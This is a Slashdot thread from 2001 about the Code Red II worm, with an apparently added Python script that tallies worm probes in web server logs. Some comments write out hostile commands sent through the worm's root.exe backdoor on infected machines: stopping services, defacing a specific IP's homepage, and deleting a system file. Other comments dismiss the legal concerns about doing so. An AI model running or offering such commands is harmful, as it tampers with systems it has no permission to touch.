    [20 million 'registered' users] * [8.5 million "gates.bill@microsoft.com" entries] * [2 million bad addresses bouncing both attachments back]= The biggest DOS spam attack in history!

    Exercise for the student: Multiply that by $0,59 for every bit/s it spends in Georgia...give 3 examples.

    --
    "History doesn't repeat itself, but it does rhyme." Mark Twain
  383. Re:Well...at least RR is trying to help... by davidbarrett · · Score: 1

    I think they've already dropped them from the network. I noticed that default.ida requests dropped from my server log starting a few days ago... And good observation ... I thought it was a bit ironic that RR was advising everyone to be aware of the possibility for infection .. nevermind the fact that you're not supposed to be running a server.

  384. CodeRed Information by SpunOne · · Score: 2, Informative

    CodeRed - There were two versions of the original CodeRed worm, both of which were strictly memory resident and fairly tame, all things considered. Both of these will show NNNN's in your log files. You can find more information here.

    CodeRed 2 - This is the worm we're seeing now, the one with the XXXX's in your logs. This worm seems to most frequently scan in its own IP range (Class A I think?) So, if you're in the 24/8 range, you'll probably see a lot of scans from people using various cable providers. You can find more information about CodeRed 2 here.

    So far, I haven't seen anything on the security sites confirming a 3rd version of this worm. The media has often used the term CodeRed3 to describe what is actually CodeRed2, the one giving us grief right now.

    If a new variant of this worm does make it into the wild, it'll be interesting to see how quickly it can spread. It seems that a lot of hosts infected with CR2 give the error (403.9 Too many users connected) when you try to access port 80, which causes the eEye scanner to miss them, and apparently keeps them from being exploited by a new worm. It also keeps people from getting to the /scripts/root.exe that CR2 leaves behind as a backdoor. I'm not sure why IIS would give an error about too many users being connected when in reality, the number of CR hits is around 1-2 a minute. It's likely that the IIS process looks for the number of open sockets and then gives that message if there are too many sockets open. This would make sense since CR2 will open up ~300 connections in its attempt to spread.

    It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me, since the patch should have fixed a buffer overflow in idq.dll. If that overflow was fixed and IIS is still crashing, perhaps there is another buffer overflow that's showing up when it gets the long string from CR2 as part of the redirection. Just a guess on my part though.
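    As an added illustration of the NNNN-versus-XXXX distinction SpunOne describes above (this is example code written for this page, not anything posted in the thread or shipped by any project), the following Python script parses Apache common-format access log lines, tells Code Red probes from Code Red II probes by the filler character after /default.ida?, and tallies them per source address into a report shaped like the one quoted near the top of this page. The log lines and the RFC 5737 documentation addresses in them are constructed for the example; the filler runs are shortened for readability, since a real probe carries a couple of hundred filler characters.

```python
"""Tally Code Red / Code Red II probes found in an Apache access log.

Added example (not from the thread): Code Red fills its /default.ida
request with 'N's, Code Red II with 'X's. Both show up in an Apache log
as 404s because Apache has no .ida handler, which is what makes the
signature easy to count from the log alone.
"""
import re
from collections import Counter

# Apache "common" log format:
#   host ident authuser [date] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Variant signatures: the probe path followed by a run of filler bytes.
# Only the leading run matters; anything after it is ignored.
VARIANT_SIGNATURES = (
    ("Code Red", re.compile(r'^/default\.ida\?N+')),
    ("Code Red II", re.compile(r'^/default\.ida\?X+')),
)


def classify_path(path):
    """Return the variant name for a request path, or None if it is not a probe."""
    for name, pattern in VARIANT_SIGNATURES:
        if pattern.match(path):
            return name
    return None


def parse_line(line):
    """Parse one common-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def tally(lines):
    """Return (Counter of probes per variant, Counter of probes per source host).

    Lines that do not parse, and requests that are not Code Red probes,
    are skipped rather than counted.
    """
    per_variant = Counter()
    per_source = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        variant = classify_path(rec["path"])
        if variant is None:
            continue
        per_variant[variant] += 1
        per_source[rec["host"]] += 1
    return per_variant, per_source


def report(per_variant):
    """Render the per-variant tally in the style of the report quoted on this page."""
    total = sum(per_variant.values())
    return "\n".join([
        f"{per_variant.get('Code Red', 0):5d} Code Red",
        f"{per_variant.get('Code Red II', 0):5d} Code Red II",
        f"{total:5d} Total attacks.",
    ])


# Constructed sample log (RFC 5737 documentation addresses, shortened filler).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Aug/2001:02:13:44 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 281
198.51.100.7 - - [07/Aug/2001:02:15:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281
198.51.100.7 - - [07/Aug/2001:02:15:03 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281
192.0.2.44 - - [07/Aug/2001:02:16:10 -0400] "GET /index.html HTTP/1.1" 200 1043
203.0.113.5 - - [07/Aug/2001:02:17:21 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281
this line is deliberately malformed and must be skipped
""".splitlines()


if __name__ == "__main__":
    variants, sources = tally(SAMPLE_LOG)
    print(report(variants))
    print()
    for host, n in sources.most_common():
        print(f"{n:5d} {host}")
```

    Feed it a real log with `tally(open("/var/log/apache/access.log"))`; the per-source counter is the list of hosts worth reporting to their network's abuse contact, which is the defensive use the thread keeps circling around.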

  385. self-patching servers by rajslashdot · · Score: 1

    I was wondering. How difficult would it be for Microsoft and other server vendors, to write servers that can be self-correcting ?

    Would it be too difficult for a server to be programmed to refer to a pre-programmed web url and download and apply any patches as applicable, automatically ?

    This would be a better solution than having "clean-up" viruses, as has been suggested in earlier discussions !

    1. Re:self-patching servers by sjonke · · Score: 1

      Wonderful idea - now IIS will do all the virus inflicting work itself!

      --
      --- What?
  386. Re:Microsoft should be sued by blang · · Score: 2

    The average Joe Schmoe is not living in a trailer park. There are tons of middle managers, and others making a decent amount, who would think nothing of paying $100's extra for software, for the same reason that they'd get a Lexus or Mercedes. Of course they need Win2k.

    --
    -- Another senseless waste of fine bytes.
  387. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  388. Wow by truthsearch · · Score: 2

    I had to read your post twice, but are you saying that people are installing Win2K and NT with the IIS service automatically running and they haven't noticed??? Wow. The reason I'm surprised is that 2k and NT are usually used by people who are at least a little tech savvy. They're not standard home OSes. I guess I shouldn't be too surprised, but it sure doesn't take a server admin to see the little IIS icon next to your clock with a green arrow showing it's running. Move the mouse over it and it says "IIS - Running". That's pure incompetence on the user's part (and bad design on the OS install to have it run auto by default).

    1. Re:Wow by rprycem · · Score: 1
      What version of IIS are you running? I have never seen this green arrow. I do a whole lot more NT / 2k administration and consulting than I care to admit to. Maybe this is something related to PWS?

  389. Morality of Counter Measures? by Maul · · Score: 2
    I have a bunch of IPs from my apache logs of attempted attacks on my box. Since I'm running a Linux box, I'm not getting infected, but I was thinking about putting a script on my error page that would SHUT DOWN (not reformat the HD) a compromised box (since the command line is fully available on a compromised machine). I know that this has been suggested...

    My only question is if such a counter measure is moral / legal. Unlike the proposed counter measure worm, this wouldn't propagate. It'd only affect boxes infected with Code Red II. I'm not sure that messing around with the machine of another user, despite my intentions or the infected state of a box, is legal.

    --

    "You spoony bard!" -Tellah

    1. Re:Morality of Counter Measures? by perrin5 · · Score: 1

      Personally, I think Legal and moral issues can be damned here: It's Freedom of Speech.

      If you were to get sued, you can simply say "your machine was accessing freely published material" and tell them to shove it.

      They can't sue for damages, because they can't prove that you caused any harm that Code Red didn't already cause...

      Just my $.02

      --
      hmmmm?
  390. Re:Buffer overflow vulnerabilities by Anonymous Coward · · Score: 1, Funny

    I wrote an all-Java OS in 1998 but can't be sure if or how it works... it's still booting.

  391. Re:Stop addressing administrators! by Anonymous Coward · · Score: 0

    Address the real perpetrators! They hide in redmond washington, behind a waterfall of payoffs to hundreds of government officials and journalists.

  392. Extrapolation. by Harbinger(JDW) · · Score: 1


    It seems likely that eventually what is going to happen is that server software will be released (IIS, Apache in a matter of time). Shortly after the release a virus will exploit a weakness found in the software and spread itself like crazy all over the net. Due to the way that SysAdmins have to fix the problem (patches) there will always be vulnerable servers out there. These vulnerable servers will continue to get infected and/or continue to infect other people.
    So now our average user wants to set up a server and buys the software a few weeks after it is released. They set it up and connect to the internet to get a patch (we'll assume they will at least try to, which is something that definitely doesn't happen). What will happen is that by the time that they navigate around the web sites of the software and find the patch their server is already infected. Now if the infection is mean it will not let them download the patch and/or let the user /think/ the patch was downloaded and installed properly but it wasn't really and the virus keeps working, infecting other vulnerable people.
    The interesting thing here is that the internet has the potential to be a huge warzone of virii where new software just out of the box a few weeks after release is vulnerable. When people install it, it gets infected before they can fix the vulnerabilities. One solution is of course to install the software and patches offline and then put the machine on the internet. The solution isn't always plausible however, especially if the software used to download patches is the software that the Virii attack.
    Most people don't necessarily consider the Internet as a hostile place, but if Virii continue to be released as fast as software is then soon everyone will be affected and find the Internet hostile.

    Just some of my thoughts.

  393. Re:Just an obvious question or two... by Anonymous Coward · · Score: 0

    Mod the above post up!

  394. How about this: by wirefarm · · Score: 2

    Don't patch if it will break other server stuff.
    Turn off IIS.
    Install Apache to your Windows box.
    Problem solved.
    If you can't do that, just turn off IIS, we don't need your content that much.

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
  395. Hogwash by gamorck · · Score: 1

    Guys - there is no new code red variant. None of the security sites I frequent mention another variant. The CNET article Taco links to simply describes exactly what the so called "Code Red II" (the third variant in reality) does.

    Why can't slashdot at least pretend that they are a real news site and try to verify this stuff? When the CNET article mentions Code Red 3 they were obviously mistaken. The point of the article is obviously to alert the world that Code Red had started attacking some oriental countries. Who gives a crap? Welcome to the rest of the world people.

    As for your problem Taco - disable Apache and stop whining - we are all getting hit with this just as hard or harder. Your whining will accomplish nothing other than agitate a few more people.

    Gam
    "Flame at Will"

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  396. Re:Sig (Offtopic) by Anomymous+Coward · · Score: 0

    not all sigs are meant to be funny? but yea, it's humorous, in a jealous sort of way.

  397. Not Legal : Patent Problem by Rashkae · · Score: 2, Funny

    If you did that, you would run afoul of McAfee's Patent on Web based virus removal and system administration.

  398. Qwest is Calling Their DSL Customers by VB · · Score: 1


    Qwest: Hi, we're calling all of our customers to find out if they've been affected by the Code Red virus. Have you been affected?

    Nope.

    Q: Huh?

    I nat everything through the router to an internal firewall. Disable the web interface.

    Q: Okay. Thanks.

    Don't mention it.

    = = =
    Qwest in Phx. Impressive customer service effort.

    --
    www.dedserius.com
    VB != VisualBasic
  399. cisco is god by mdouglas · · Score: 1

    i found this on NANOG :

    how to stop the spread of code red with acl's on routers

    http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml

  400. Call in the BSA! by wirefarm · · Score: 2

    I came to the same conclusion that you did - I'm getting hit by home users - ATT.co.jp in my case.
    People with the same dialup connection that I have.
    Where do home users typically get their copy of Win2K or NT Server? Yup, that's right, they 'borrow' it from work.
    So start telling people the 'truth' - That Code Red is actually the BSA's way of routing out unlicenced Windows installs...
    ;-)
    Pity that the 'default page' on IIS doesn't list the 'Registered User' on it. That would get people turning off unused servers.

    Funny thing is that I had just written the firewall explanation page below as it became very timely - I now get more hits for that than from Code Red.

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
  401. Is this a trick from Hollywood? by Anonymous Coward · · Score: 1, Funny

    I mean, who else would come out with THREE versions of an original idea, each one worse than the one before?!?

    1. Re:Is this a trick from Hollywood? by Anonymous Coward · · Score: 0
      Notice how Code Red is starting to resemble the Rocky movie sequels?

      Aaaaadriannnnnnnnnnnnnnnnnnnn!!...

  402. Code Red (I,II,III) Fix for Apache webservers by Anonymous Coward · · Score: 0

    Redirect /default.ida http://www.microsoft.com/default.ida

    1. Re:Code Red (I,II,III) Fix for Apache webservers by CM39 · · Score: 2, Funny


      I tried redirecting it and it didn't work. :-)

      --

      "PMS is the time of the month when women act like men do all the time"
      Robert Heinlein
    2. Re:Code Red (I,II,III) Fix for Apache webservers by Anonymous Coward · · Score: 0
      Redirect /default.ida http://www.microsoft.com/default.ida

      Why not redirect it back at the infected server. That could be interesting if it actually follows the redirection.

  403. Even Better. Much, actually. by szomb · · Score: 1

    Rather than just putting it on a few of your own machines, how about overwriting the default.ida on your "attacker's" box (since it's root-compd) to do the same?

    Seems a little more ethical than just taking it down, which of course is what we all WANT to do (grrr, I wish I had an offshore co-lo server.)

    --
    Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  404. Code Red III by red0x · · Score: 1

    I read about Code Red III being a translation error from korean ppls. Read Bugtraq, Code Red III does NOT exist (yet).

    Also, more on code red II variants...

    > My iis5.0 (patched) logs show the length of the original CodeRed II worm as 3818.

    >It's the same Code Red II.

    >The overall request is usually 3818 bytes, but this is 3379 bytes of payload
    >plus whatever headers are used:

    > GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX....
    > Content-type: text/xml
    > Content-length: 3379
    >
    > {{3379 bytes of binary data here}}
    >
    >I routinely find other headers too, such as:
    >
    > GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX....
    > Host: 64.170.162.100
    > Connection: keep-alive
    > Content-type: text/xml
    > Content-length: 3379
    > Via: 1.0 ampere (NetCache NetApp/5.0.1R2)
    > X-Forwarded-For: 212.198.146.153

    > {{3379 bytes of same binary data here}}

    >Same great taste, just a bit more filling.

    >No evidence *whatsoever* of any Code Red II variants.

    >Steve

    --red0x

    --
    --red0x
  405. Uses for compromised machines? by Anonymous Coward · · Score: 0

    Am I the only one who sees all those wide-open machines in my fw logs and thinks: SETI@home all time winner?

  406. Shutting off IIS on an comprimised box... by Xibby · · Score: 2

    All it should take is sending a request like this: http://infected.host/scripts/root.exe?/c+start%%20 net%20stop%20ServiceName+c:\\

    Figure out what the service name for IIS is and you can make it do a clean belly flop. No real damage done.

    A full list of the exact services is found in the registry (run regedit.exe) under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key.

    Other things you could stop are Server and Workstation, and Maybe Simple TCP/IP Services. There is plenty you can do to a NT box with just the command line. And it starts getting really fun after you install the NT resource kit.

    I know more than I ever wanted to know about NT...

    --
    I'm going to go back in my box and will think within the limits of my box: MS Sucks Linux Good I read too much Slashdot.
    1. Re:Shutting off IIS on an comprimised box... by Zibby · · Score: 0

      Yeah, that was intentional. Play with it a bit and you'll hit paydirt sooner or later. ;)

      --
      "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." - Albert Einstein
  407. Re:Microsoft should be sued by fors · · Score: 1

    Install IIS. Did it to me. I have an advantage though, my W2K system can't be gotten to from the net. I wouldn't have W2K at all but work requires it.

    --
    "If there is nothing you are willing to die for, then you are not really alive." Myself
  408. How can They Justify It's the 3rd Sequel by robbyjo · · Score: 1

    I really don't know why the people could justify that it is really the third sequel of the virus meanwhile the report says:

    "About 10 damage reports have come in which were believed to have been the result of the latest Code Red III,"...

    It's still only 10 damages and the cause of the damage is not yet known. Those people in the news are really clever at getting attention...

    Usually viruses are called sequels only if they exhibit some degree of likeness in binary form (correct me if I'm wrong). Even then, some are not considered sequels, only variants. Remember those days when Jerusalem-B or Michelangelo attacked? This time, we really don't know what Code Red 3 looks like and they say it's the 3rd sequel?

    --

    --
    Error 500: Internal sig error
  409. Thanks for the suggestion by WillSeattle · · Score: 3, Funny

    I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

    OK, it will be ready in an hour, just got to build the array handler routine.

    --
    --- Will in Seattle - What are you doing to fight the War?
  410. Re:Put it in another log and forget about it. by Anonymous Coward · · Score: 0

    ach - I meant: http://64.173.108.11/scripts/root.exe?+%2fc+echo+% 22document.location%3d%27http%3A//goatse.cx%27%22+ > +..\wwwroot\default.htm

  411. Re:Buffer overflow vulnerabilities by Anonymous Coward · · Score: 0

    >Us java programmers are laughing our asses of
    >each time a buffer overflow is wreaking havoc on
    >the internet. We don't have to worry about such
    >things. Java may not be the greatest thing, but
    >you can rest assure that buffer overflows won't
    >happen.

    Isn't the Java runtime machine written in C/C++?

  412. it could be real by Anonymous Coward · · Score: 0

    it could be a real 3rd (4th) variant. see http://www.securityfocus.com/archive/75/203279 for details.

  413. Re:Buffer overflow vulnerabilities by unitron · · Score: 2

    But think of the great uptime stat you've got going!

    --

    I see even classic Slashdot is now pretty much unusable on dial up anymore.

  414. Getting back... by Anonymous Coward · · Score: 0

    Don't you think it's possible that we should be able to begin isolating where these worms are originating? After *three* releases, this guy is really pushing things...

  415. Microsoft should be sued by Rosco+P.+Coltrane · · Score: 4, Flamebait
    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

    I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

    (of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
    1. Re:Microsoft should be sued by IronChef · · Score: 2


      you have it backwards. The tide is the industry. The consumers are in the castle.

    2. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

      But MS make it so easy for non-sysadmin types to install such earth shattering software. Average Shmoes wouldn't know the impact of clicking yes to install all software. A real Sys admin understands the consequences and that he/she needs to maintain the security. Most NT admins I know don't understand the full consequences themselves. Just another reason why the MS philosophy of making computer systems more accessible to the computer-uneducated has a fundamental flaw when it comes to high level services. To use the car analogy others use here, they don't sell cars to 8 year olds, and the state govs don't give licenses to 8 year olds either. In MS business practice they would.

    3. Re:Microsoft should be sued by mpe · · Score: 2

      Because we're not talking about admins, but gullible users.

      Quite often with Windows the expectation is that "users" and "admins" are one and the same though...

    4. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

      Christ no. We're already having to fork out $4.00 a pack for Mollies in a tobacco-growing state as a result of the state AG extorting money out of everybody else on behalf of the health-care/insurance/financial/welfare racket.

      If you have to sue MS. let it be a consumer class-action. That way you might see something out of it, at least.

      "Luke Duke"

    5. Re:Microsoft should be sued by Eyston · · Score: 1

      You think Joe Schmoe shelled out a few hundred bucks for Win2k/NT? I don't think so. CodeRed is attack of the MS warez pirates. Makes it hard to sue someone for software you stole in the first place (although it'd be funny watch). -Eyston

    6. Re:Microsoft should be sued by RobYoung · · Score: 0
      To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

      To solve the problem of servers being shut down and the internet being slowed down, we're gonna send emails to every single Windows 2000 user?

      I agree with other posters that the responsibility is in the hands of the system admins and the home users (i do believe cable and DSL are being hit hard, too). MS has done what they can by making the patch available, and the media "hype" involved with this virus should be enough for admins and users to download the patch.

    7. Re:Microsoft should be sued by Kaki+Nix+Sain · · Score: 1

      If you are an owner responsible for any car, regardless of the manufacturer, it's your job to be aware. However, that does not allow the manufacturer to abdicate all responsibility for the results of others using their vehicles. Is there a principled difference between these two domains? Perhaps software makers just like their current lack of responsibility; I did too. I was also a child, as were the other production industries, but I grew up and so have they (to some extent).

      --

      (C) Kaki Sain, 2011. By reading this, you have illegally copied my property to your brain.

    8. Re:Microsoft should be sued by Keith+Russell · · Score: 5, Insightful
      ...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.
      IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

      Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

      *: This also applies to NT 4.0.
      --
      This sig intentionally left blank.
    9. Re:Microsoft should be sued by blang · · Score: 5, Insightful

      Because we're not talking about admins, but gullible users. When I did a quick tour of the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action lawsuit to me.

      --
      -- Another senseless waste of fine bytes.
    10. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

      "Or else his PC vendor sold him the thing pre-configured with Win2K Server. That doesn't seem unlikely to me at all. "

      Considering W2K Server is a $500-some dollar line item on the invoice, I really doubt it. I think we can chalk the mayhem on cable/dsl networks up to warez and warez alone.

    11. Re:Microsoft should be sued by Anonymous Coward · · Score: 0
      Things you buy shouldn't suck.

      what if i bought a ho? she should suck golf balls thru a garden hose. bizatch, you better gobble that cock!

    12. Re:Microsoft should be sued by cr0sh · · Score: 3, Insightful

      I can't count the number of times when patches have been applied to NT-based servers, only to have other server software (generally third-party) die after the patch is put into place.

      Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:

      1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
      2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.

      Suddenly, it all makes sense...

      --
      Reason is the Path to God - Anon
    13. Re:Microsoft should be sued by garcia · · Score: 2

      yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

      it is both MS's responsibility and the user's. I agree that the user should know what the hell he is doing, but MS should not have *ANY* service installed by default w/o telling the end user (especially when targeting the market they are).

    14. Re:Microsoft should be sued by blang · · Score: 2
      Printing it in a license does not exempt them from state and federal laws, not to speak of other countries.

      If reckless conduct and damages are proved, the little print in the license is not worth piffle.

      --
      -- Another senseless waste of fine bytes.
  416. Details? by agusus · · Score: 0, Redundant

    That Cnet article isn't very descriptive... does anyone know the details on it... what is a "wider" back door - how much wider could it get?

  417. Part III? by CzarnyKozak · · Score: 0

    I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per se, but perhaps the old code red does something to tell the new code red to "come here" or something? The fact the old code red is turned off tells me that they might be linked to the same person(s) or something.. if I were some independent cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.

    --
    Slashblots are only intended for entertainment purposes only! They can be seen about three times a day!
  418. What to do with server logs? by Anonymous Coward · · Score: 0

    2001-08-03 03:27:38 Should I bother to report cracked systems? (askslashdot,spam) (rejected)

    The world may never know....

  419. Finally by nEoN+nOoDlE · · Score: 5, Funny

    Sequels that are actually better than the original.

    --
    Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
    1. Re:Finally by Anonymous Coward · · Score: 0

      American Pie 2 was better than the original... go check it out if you're under 30. :-)

    2. Re:Finally by silent_poop · · Score: 1

      So should this one be titled 'Code Red Strikes Back' or 'Return of the Code Red' ?

      --

      --
      silence is poetry.
  420. Re:Sig (Offtopic) by fatarfy · · Score: 1

    If Bill Gates had a nickel for every time Windows crashed...
    ..oh wait, he does.


    That's the funniest sig I've seen on slashdot!

  421. I know what I did!!! by InfoSec · · Score: 1

    I went into my apache config, and set up the PHP mime type to interpret .ida extensions as PHP addresses. I then wrote a PHP script called default.ida which opens a socket back to the requester on port 80, requests /scripts/root.exe, and then sends "del c:\winnt\system32\ntoskrnl.dll". This may look overly nasty, but in truth I never send a confirmation (you know, it asks "Are you sure(y/n)"), so the file isn't actually deleted. The whole idea makes me feel happy though!!!! :)

    --

    Wherever you go, there I am...
  422. Guess I'll have to avoid synagogues. by Ungrounded+Lightning · · Score: 2

    I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

    Guess I'll have to avoid synagogues.

    But I thought Deuteronimy was a sin whose commission involved Hydrogen 2. Setting off fusion bombs, maybe?

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  423. Re:Well...at least RR is trying to help... by analog_line · · Score: 1
    Now...how are they supposed to get the patches, tho...?

    They've had a month to get the patch. If they haven't by now, whenever they get back from Pluto, they can use a friend's cable modem or a POTS modem and get the relatively small patch. I'm finding it hard to generate any sympathy for people still infected by this virus.

  424. More info? by Mike+Hicks · · Score: 2

    Anyone have more info? How it looks in logs, etc.?

  425. Dissection of Code Red versions...a timeline: by Anonymous Coward · · Score: 1, Funny

    V1: Basic worm code
    V1.1: Enhanced code
    V2: Back door "feature"
    V3: Faster attack "feature"
    V3.1: Faster attack and multiple backdoor "feature"

    ------Today: Slashdot reports Code Red V4

    V4: Failed version, the worm can't infect other systems, author too dumb to put dots in IP address
    V5: Total code rewrite, GNU licensed, autopatch feature (downloads a copy of bsd or linux and installs it on the NT box)
    V5.1: Faster reinstall (err....patch), now the user can select which OS/distribution.

    ------Next Week:Meanwhile, Microsoft patents the "Internet Worm" concept.

    V6: Final release, the worm now infects the victim's server and starts to post comments in Slashdot about Code Red...

  426. Re:ok you bigots :) by Gnea · · Score: 1

    you hope i wasn't serious? please explain.

  427. And to think... by nion · · Score: 1

    if these servers simply ran a cron job to apt-get the latest security updates... Oh, wait. Nevermind. ;)

    --
    der dee der.
  428. If the log hits aren't for you, do the right thing by Darby · · Score: 4, Funny

    and see that they go where they belong. I mean seriously, I've seen lots of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the effect of: If you're looking for such and such they're actually located here.
    It's just common courtesy provided it isn't a competitor's site.

    So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

    A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

  429. Yes, switch to Linux and never patch your machine by Anonymous Coward · · Score: 0

    that would be so much more secure. Very insightful +3.

  430. Re:Buffer overflow vulnerabilities by TheMidget · · Score: 1
    > It is possible to do the same thing with any programming language I can think of (even basic but you would have to write your own routine for it).

    Show me how to do it in Java, or in Perl? And no, using JNI (or XS) is cheating.

  431. Oddly enough... by Nafai7 · · Score: 1

    The press is going MUCH easier on Microsoft than they ever were on Firestone.

  432. Code Red 'counter' by Delphis · · Score: 2, Informative

    I'm not too worried about the IP address, although I am interested to know how many times an infection attempt has been tried (amusing when you're using apache 1.3.20). The simple command:

    cat /var/log/httpd/*/access_log.099* | grep default.ida | wc -l

    acts like a simple 'counter', if you have your logs for different sites split up and using rotatelogs like I do.

    --
    Delphis
  433. Poll idea by moz25 · · Score: 1

    Well, an interesting poll might be: "how often has your web server been probed for IIS vulnerabilities"?

    My web server (listening to 10 ips) has been probed exactly 7623 times. Pretty stupid, since I don't even run IIS. Oh well....

    Moz.

  434. Re:ok you bigots :) by dermotfitz · · Score: 1

    erm
    that's crII brother. Not III. III is unknown to us so far.

    --

    How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
  435. "If you sue us, we'll sue you." by yerricde · · Score: 1

    Printing it in a license does not exempt them from state and federal laws

    Fine Print: "You agree not to hold us liable for any damages. If you do sue us, this license agreement is terminated, you have no rights under this EULA, and we'll sue you for copyright infringement and win because we have billions of dollars of cash on hand to buy out half the law firms in the United States."

    not to speak about other countries.

    Fine Print: "This agreement is subject to the laws of the United States of America and the State of Washington without respect to conflict of law provisions."

    If reckless conduct

    What is reckless? "This software comes with ABSOLUTELY NO WARRANTY." The GNU GPL says it; most other EULAs say it too.

    --
    Will I retire or break 10K?
  436. Just an obvious question or two... by glebite · · Score: 2

    Has anybody in this forum had a machine in their universe infected by the Code Red worm? (any variant) You can reply as AC if you wish...

    Secondly, when Code Red was on your machine, was net access notably slower? Basic machine performance slower?

    I'm just curious as I would figure that an infected machine with several threads of code running would slow my machine down to the point that even if I had no knowledge of whether IIS was on my machine, I would at least notice a difference...

    I personally think hearing of people's experiences, getting some message out to the press might help. (ie - cable modem and other users running Windows NT or 2000 might have noticed a performance degradation - check for this patch to download) (as if the press coverage wasn't enough to warn people...)

    --
    I donate all spillover Karma to the charity of my choice... Ada was still a babe despite what people may say...
  437. More info on Code Red III by Sideways+The+Dog · · Score: 4, Funny
    WARNING, VIRUS ALERT!!!

    If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code, screw up the tracking on your VCR and use subspace field harmonics to scratch any CDs you try to play.

    It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer. It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

    It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

    It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

    "Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows, and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

    --
    "Love is never saying you're too proud." -Tonic
